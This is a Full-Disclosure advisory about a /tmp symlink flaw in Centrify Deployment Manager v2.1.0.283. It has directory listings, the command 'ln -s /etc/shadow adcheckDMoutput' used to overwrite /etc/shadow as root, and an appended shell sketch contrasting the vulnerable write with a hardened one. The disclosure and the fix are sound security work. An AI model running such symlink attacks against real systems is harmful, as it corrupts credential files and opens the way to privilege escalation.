
[Full-disclosure] Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling



<html><body><div><h2>Centrify Deployment Manager v2.1.0.283</h2><hr>
<p>While at a training session for Centrify, I noticed poor 
handling of files in /tmp.  I was able to overwrite /etc/shadow with the
contents of adcheckDMoutput.
</p><p>I am sure there are more vulnerabilities to be exploited, maybe a 
local root - but being this is a training class I should probably 
focus.....
</p><pre>total 6680
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rw-rw-r-- 1 clyde clyde     188 Dec  3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib
</pre>
<pre>[root@engnew-cen tmp]# ls -l
total 6680
-rw-rw-rw- 1 root  root     3999 Dec  3 14:41 adcheckDMoutput
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib
</pre>
<pre>[root@engnew-cen tmp]# ls -l
total 6688
<b>-rw-rw-rw- 1 root  root     3999 Dec  3 14:41 adcheckDMoutput</b>
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 clyde clyde     132 Dec  3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib
</pre>
<pre>[root@engnew-cen tmp]# ls -l
total 6672
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
</pre>
<pre># ln -s /etc/shadow adcheckDMoutput
# ls -l /etc/shadow
-r-------- 1 root root 3999 Dec  3 14:56 /etc/shadow
</pre>
<p>I am also assuming the .210 appended to the end of files in /tmp is the major 
version number. 

</p><p>Larry W. Cashdollar<br>
@_larry0
</p></div></body></html>
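
Added example, not part of the original post and not Centrify's code: a shell sketch of the file-handling pattern the report describes next to a hardened form. It assumes the output is written by plain redirection to a fixed name; `write_naive`, `write_safe` and `run_demo` are hypothetical names, and the demo runs in a constructed scratch directory where `shared` stands in for /tmp and `protected` for a root-owned file.

```shell
#!/bin/sh
# Constructed demo: nothing outside a private scratch directory is touched.

# Pattern from the report (assumed): fixed, predictable name in a shared
# directory; plain redirection follows whatever symlink is already there.
write_naive() {   # $1 = shared dir, $2 = data
    printf '%s\n' "$2" > "$1/adcheckDMoutput"
}

# Hardened form: an unpredictable 0700 directory from mktemp -d, files created
# under umask 077, and noclobber so an existing path is never overwritten.
write_safe() {    # $1 = shared dir, $2 = data; prints the path written
    (
        umask 077
        set -C
        d=$(mktemp -d "$1/adcheck.XXXXXXXXXX") || exit 1
        printf '%s\n' "$2" > "$d/output" || exit 1
        printf '%s\n' "$d/output"
    )
}

# Builds the scenario, runs one writer, prints the protected file's content.
run_demo() {      # $1 = "naive" or "safe"
    scratch=$(mktemp -d) || return 1
    shared="$scratch/shared"
    mkdir "$shared"
    printf 'original\n' > "$scratch/protected"
    # Link already present under the predictable name before the tool runs.
    ln -s "$scratch/protected" "$shared/adcheckDMoutput"
    if [ "$1" = naive ]; then
        write_naive "$shared" "tool output"
    else
        write_safe "$shared" "tool output" > /dev/null
    fi
    cat "$scratch/protected"
    rm -rf "$scratch"
}
```

`run_demo naive` prints `tool output` because the protected file was overwritten through the link; `run_demo safe` prints `original`.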
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/